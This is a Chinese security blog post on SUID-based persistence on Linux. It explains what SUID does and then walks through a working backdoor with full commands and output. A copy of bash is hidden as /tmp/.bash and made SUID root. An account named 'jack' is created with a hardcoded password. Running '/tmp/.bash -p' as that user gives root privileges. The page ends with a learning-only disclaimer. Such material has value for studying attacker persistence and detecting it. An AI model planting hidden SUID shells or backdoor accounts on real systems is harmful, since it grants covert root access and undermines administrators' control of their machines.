Linux之SUID权限维持-Happy峰

SUID权限维持

SUID介绍

SUID是一种特殊权限，设置了suid的程序文件，在用户执行该程序时，用户的权限是该程序文件属主的权限，例如程序文件的属主是root，那么执行该程序的用户就将暂时获得root账户的权限。sgid与suid类似，只是执行程序时获得的是文件属组的权限。passwd这个命令程序的权限设置，它就是设置了suid权限的

注意以下几点：

1. 只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.

2. 命令执行者要对该程序文件拥有执行(x)权限.

3. 命令执行者在执行该程序时获得该程序文件属主的身份.

4. SUID权限只在该程序执行过程中有效,也就是说身份改变只在程序执行过程中有效

SUID维持

1、找到bash文件

[root@localhost ~]# whereis bash
bash: /usr/bin/bash /usr/share/man/man1/bash.1.gz
[root@localhost ~]#

因为我是centos所以在/usr/bin/bash

2、复制到普通用户环境能接触的文件夹

[root@localhost ~]# cp /bin/bash /tmp/.bash
[root@localhost ~]# ls /tmp/ -a
.  ..  .bash  .font-unix  .ICE-unix  .Test-unix  .X11-unix  .XIM-unix
[root@localhost ~]#

3、设置权限

[root@localhost ~]# chmod 4755 /tmp/.bash 
[root@localhost ~]# chmod +s /tmp/.bash

4、创建一个普通用户jack

useradd -p `openssl passwd -1 -salt 'salt' 123456` jack

5、使用jack用户登录

6、运行/tmp/.bash

[jack@localhost ~]$ /tmp/.bash -p
.bash-4.2# id
uid=1000(jack) gid=1000(jack) euid=0(root) egid=0(root) groups=0(root),1000(jack)
.bash-4.2# whoami 
root
.bash-4.2#

文章版权声明 1、本网站名称：Happy峰安全运营之路
2、本站永久网址：https://blog.chenjiangfeng.com
3、本站发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！
4、本网站的文章部分内容可能来源于网络，仅供大家学习与参考，如有侵权，请联系站长进行删除处理。
5、本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
6、本站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
7、根据《计算机软件保护条例》第十七条，本站所有软件请仅用于学习研究用途

本站所有内容（包括但不限于文字、图片、视频等）均受到版权法保护，归作者所有，未经授权不得转载、复制或用于其他任何商业目的。转载请注明出处，并保留原文链接。对于未经授权的使用，我们将保留追究法律责任的权利。

THE END